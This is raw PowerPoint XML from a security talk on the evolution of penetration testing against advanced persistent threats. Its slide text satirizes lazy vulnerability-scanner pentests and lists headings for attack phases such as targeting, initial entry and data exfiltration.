              </a:solidFill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077200" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = Soap, Lather, Rinse, Repeat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8600" y="2514600"/>
            <a:ext cx="8458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 smtClean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r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a: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sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D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576263" indent="-57626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GB" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Step 1: Scoping call</a:t>
            </a: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GB" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tell the customer how thorough you will be, while promising not to break anything</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1400" dirty="0" smtClean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400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2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GB" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Step 2: Run Vulnerability Scanner</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2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GB" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NeXpose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Qualys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, Retina, or whatever. Run the scanner and get on twitter all day</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="576263" indent="-576263" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="45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400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2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GB" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Step </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3: Run Exploit Framework</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2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GB" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Core Impact, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, Canvas, Saint, or whatever. Use same exploit as last week’s test</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1400" dirty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5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400" dirty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GB" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Step </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4: Copy paste info from previous customer’s report into new one</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2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GB" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tell your team lead how hard you are working on this report – you are swamped</a:t>
            </a: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GB" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Get back on Twitter and talk about </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Anonymous, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LulzSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, and APT</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1400" b="1" dirty="0" smtClean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400" b="1" dirty="0" smtClean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GB" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Step 5: Give customer recommendations they will never implement</a:t>
            </a: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GB" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You don’t even read the recommendations you are giving to the customers because you know they</a:t>
            </a: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GB" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>won’t  ever be implemented. </a:t>
            </a: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400" b="1" dirty="0" smtClean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r>
              <a:rPr lang="en-GB" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Back to twitter.....</a:t>
            </a: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600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="576263" indent="-576263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</a:pPr>
            <a:endParaRPr lang="en-GB" sz="16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1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eader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ooter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639445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808080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strategic Security, Inc. ©                http://www.strategicsec.com/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill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81000" y="3200401"/>
            <a:ext cx="8382000" cy="685799"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"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>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If you were Ub3r 31337 you did it like this.... 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8600" y="2514600"/>
            <a:ext cx="8458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 smtClean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r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a: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sz="16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170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eader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ooter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639445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808080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strategic Security, Inc. ©                http://www.strategicsec.com/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill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43000" y="1371600"/>
            <a:ext cx="7026275" cy="1895475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"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>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Port Scan &amp; Banner Grab The Target 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8600" y="2514600"/>
            <a:ext cx="8458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 smtClean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b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRP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r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="565150" indent="-56515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tabLst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  <a:tab pos="9709150" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D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057400"/>
            <a:ext cx="41148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028825"/>
            <a:ext cx="4362450" cy="460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45170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6732</TotalTime>
  <Words>2967</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>839</Paragraphs>
  <Slides>67</Slides>
  <Notes>44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Diseño predeterminado</vt:lpstr>
      <vt:lpstr>Theme1</vt:lpstr>
      <vt:lpstr>Big Bang Theory... The Evolution of Pentesting High Security Environments </vt:lpstr>
      <vt:lpstr>Joe McCray.... Who the heck are you? </vt:lpstr>
      <vt:lpstr>Chris Gates.... Who the heck are you? </vt:lpstr>
      <vt:lpstr>How I Throw Down...(j0e)</vt:lpstr>
      <vt:lpstr>How I Throw Down....... (CG)</vt:lpstr>
      <vt:lpstr>Let me take you back.... </vt:lpstr>
      <vt:lpstr>Pentesting = Soap, Lather, Rinse, Repeat</vt:lpstr>
      <vt:lpstr>If you were Ub3r 31337 you did it like this.... </vt:lpstr>
      <vt:lpstr>Port Scan &amp; Banner Grab The Target </vt:lpstr>
      <vt:lpstr>Get your exploit code... </vt:lpstr>
      <vt:lpstr>Own the boxes and take screen-shots </vt:lpstr>
      <vt:lpstr>Write The Report... </vt:lpstr>
      <vt:lpstr>Get Paid.... </vt:lpstr>
      <vt:lpstr>Geez...That's A Lot To Bypass</vt:lpstr>
      <vt:lpstr>How About A Challenge</vt:lpstr>
      <vt:lpstr>News Flash...... All That Doesn’t Stop APT!!!!</vt:lpstr>
      <vt:lpstr>2 Quotes That Sum Up APT</vt:lpstr>
      <vt:lpstr>Slide 18</vt:lpstr>
      <vt:lpstr>Slide 19</vt:lpstr>
      <vt:lpstr> Who Got Owned? Defense Contractors</vt:lpstr>
      <vt:lpstr> Who Got Owned? Financials &amp; Other Prominent Organizations</vt:lpstr>
      <vt:lpstr> Who Got Owned? Small-MidSized Companies</vt:lpstr>
      <vt:lpstr>Slide 23</vt:lpstr>
      <vt:lpstr> What’s up with APT</vt:lpstr>
      <vt:lpstr> APT vs. Pentesting</vt:lpstr>
      <vt:lpstr> This Is What It Is All About (Business Impact)</vt:lpstr>
      <vt:lpstr> Vulnerability Driven Industry</vt:lpstr>
      <vt:lpstr> Lots of People Talk About How APT Works</vt:lpstr>
      <vt:lpstr>News Flash...... APT Doesn’t Rely On Vulnerabilities!!!!</vt:lpstr>
      <vt:lpstr> Data Driven Assessments</vt:lpstr>
      <vt:lpstr>What Has To Happen??? What Needs To Change???</vt:lpstr>
      <vt:lpstr> Vulnerability Driven VS. Capability Driven</vt:lpstr>
      <vt:lpstr>Evaluating Capabilities</vt:lpstr>
      <vt:lpstr>The Process</vt:lpstr>
      <vt:lpstr>Evaluating Capabilities</vt:lpstr>
      <vt:lpstr>How the Attack Works</vt:lpstr>
      <vt:lpstr>Evaluating Capabilities</vt:lpstr>
      <vt:lpstr> Evaluating Capabilities</vt:lpstr>
      <vt:lpstr> Phase 1: Targeting</vt:lpstr>
      <vt:lpstr> Phase 1: Targeting</vt:lpstr>
      <vt:lpstr> Phase 1: Targeting</vt:lpstr>
      <vt:lpstr> Phase 1: Targeting</vt:lpstr>
      <vt:lpstr> Phase 2: Initial Entry</vt:lpstr>
      <vt:lpstr> Phase 2: Initial Entry</vt:lpstr>
      <vt:lpstr> Phase 2: Initial Entry</vt:lpstr>
      <vt:lpstr> Phase 2: Initial Entry</vt:lpstr>
      <vt:lpstr> Phase 2: Initial Entry</vt:lpstr>
      <vt:lpstr> Phase 3: Post-Exploitation</vt:lpstr>
      <vt:lpstr> Phase 3: Post-Exploitation</vt:lpstr>
      <vt:lpstr> Phase 4: Lateral Movement</vt:lpstr>
      <vt:lpstr> Phase 4: Lateral Movement</vt:lpstr>
      <vt:lpstr> Phase 5: Data Exfiltration</vt:lpstr>
      <vt:lpstr> Phase 5: Data Exfiltration</vt:lpstr>
      <vt:lpstr> Phase 5: Data Exfiltration</vt:lpstr>
      <vt:lpstr> Phase 5: Data Exfiltration</vt:lpstr>
      <vt:lpstr> Phase 5: Data Exfiltration</vt:lpstr>
      <vt:lpstr> Phase 5: Data Exfiltration</vt:lpstr>
      <vt:lpstr> Phase 5: Data Exfiltration</vt:lpstr>
      <vt:lpstr> Vulnerability Driven VS. Capability Driven</vt:lpstr>
      <vt:lpstr> Vulnerability Driven VS. Capability Driven</vt:lpstr>
      <vt:lpstr> What About Threat Modeling &amp; Risk Assessment?</vt:lpstr>
      <vt:lpstr> Threat Modeling</vt:lpstr>
      <vt:lpstr>Risk Assessment</vt:lpstr>
      <vt:lpstr> Vulnerability Tracking Systems, Threat Modeling &amp; Risk Assessment</vt:lpstr>
      <vt:lpstr> References for APT</vt:lpstr>
      <vt:lpstr>Holla @ CG.... </vt:lpstr>
      <vt:lpstr>Holla @ j0e....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Wall</dc:creator>
  <cp:lastModifiedBy>j0e</cp:lastModifiedBy>
  <cp:revision>492</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-02-14T21:39:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-05-12T17:07:23Z</dcterms:modified>
</cp:coreProperties>
</file>